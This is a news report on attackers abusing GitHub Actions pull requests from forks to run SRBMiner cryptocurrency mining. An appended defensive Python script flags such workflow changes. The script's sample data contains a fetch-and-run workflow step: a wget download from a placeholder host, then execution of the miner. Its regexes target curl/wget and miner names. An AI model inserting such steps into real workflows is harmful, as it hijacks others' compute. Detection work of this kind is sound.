It has been discovered that a group of hackers has long been using GitHub’s cloud infrastructure to covertly mine multiple cryptocurrencies. The attacks were first detected by a French software engineer in November 2020, and a team of staff at the development platform confirmed them to The Record. The platform is now thoroughly investigating what happened and who is responsible for this illegal activity.
According to the findings, the attack took advantage of a GitHub feature called GitHub Actions, which lets users automatically run tasks and workflows when a certain event occurs within their repositories.
To launch the cryptocurrency mining software, the attackers forked an existing repository, added a malicious GitHub Actions element to the original code, and then filed a pull request (sometimes translated as “validation request”) against the original repository to merge the code back into it, according to The Record.
Only objective: get free coins
The original project owner did not have to approve the malicious pull request: right after it was submitted, GitHub’s systems read the attacker’s code and launched a virtual machine capable of downloading and running cryptocurrency mining software, as explained by Dutch security engineer Justin Perdok.
Miner itself is downloaded from gitlab. pic.twitter.com/5twTjuL2vK
– Justin Perdok (@JustinPerdok) April 2, 2021
According to the posted screenshot (shared in this article), the software used for mining included SRBMiner, which mines multiple cryptocurrencies on consumer hardware that is easy to buy, specifically GPUs and CPUs.
In any case, it appears that the attackers weren’t looking to damage the repositories in any way, just to get free coins using GitHub’s servers, according to the report.
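The fork-and-pull-request pattern described above can be triaged from a pull request's list of changed files. The following is an added example, not code from The Record, GitHub or Justin Perdok; it assumes records shaped like GitHub's "list pull request files" API response (`filename`, `status`, `patch`), and the function names, sample data and `example.invalid` URL are constructed.

```python
import re

# Added lines in a workflow patch that suggest "download something and run it".
FETCH = re.compile(r"\b(curl|wget)\b", re.I)
# Miner family named in the article; extend with your own indicators.
MINER = re.compile(r"srbminer", re.I)
# GitHub Actions workflow definitions live under this path.
WORKFLOW = re.compile(r"^\.github/workflows/[^/]+\.ya?ml$")


def added_lines(patch):
    """Yield the lines a unified-diff patch adds (skipping '+++' headers)."""
    for line in (patch or "").splitlines():
        if line.startswith("+") and not line.startswith("+++"):
            yield line[1:]


def triage_pull_request(files, from_fork):
    """Return (filename, reason) findings for a PR's changed-file records."""
    findings = []
    for f in files:
        name = f["filename"]
        if not WORKFLOW.match(name):
            continue  # only workflow definitions are of interest here
        if from_fork:
            findings.append((name, f"workflow {f['status']} by fork PR"))
        for line in added_lines(f.get("patch")):
            if MINER.search(line):
                findings.append((name, "known miner name in added line"))
            elif FETCH.search(line):
                findings.append((name, "added step fetches remote content"))
    return findings


# Constructed sample: changed files of a hypothetical pull request from a fork.
SAMPLE_FILES = [
    {"filename": "README.md", "status": "modified",
     "patch": "@@ -1 +1 @@\n-old\n+new"},
    {"filename": ".github/workflows/ci.yml", "status": "modified",
     "patch": "@@ -8,3 +8,5 @@\n     steps:\n"
              "+      - run: wget https://example.invalid/tool.tar.gz\n"
              "+      - run: ./SRBMiner\n"},
]

if __name__ == "__main__":
    for name, reason in triage_pull_request(SAMPLE_FILES, from_fork=True):
        print(f"{name}: {reason}")
```

String matching like this is a triage signal for reviewers only; a renamed binary or an encoded command will not match.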